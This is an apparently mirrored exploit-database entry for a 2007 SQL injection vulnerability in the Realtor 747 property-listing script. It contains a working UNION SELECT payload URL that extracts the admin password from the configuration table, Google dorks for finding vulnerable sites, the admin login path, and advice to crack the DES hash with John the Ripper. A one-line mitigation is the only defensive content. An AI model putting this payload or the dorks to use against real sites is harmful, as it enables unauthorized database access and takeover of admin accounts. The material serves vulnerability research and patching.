header-logo
Suggest Exploit
vendor:
Realtor 747
by:
t0pP8uZz & xprog
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Realtor 747
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Realtor 747 SQL Injection Vulnerability

Pullout admin password from database

Mitigation:

Implement input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+                  Realtor 747 SQL Injection Vulnerbility                     +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.it747.com/realtor747
DORK: inurl:"index.php?pageid=" Property Listings
DORK 2: inurl:"realtor747"


DESCRIPTION:
pullout admin password from database


EXPLOITS:
http://server.com/realtor747/index.php?pageid=2&categoryid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/AD747_CONFIG%20where/**/config_key=0x70617373776F7264/*


NOTE/TIP:
admin login is at /admin/
password is encrypted in DES, use JTR


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+                  Realtor 747 SQL Injection Vulnerbility                     +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-14]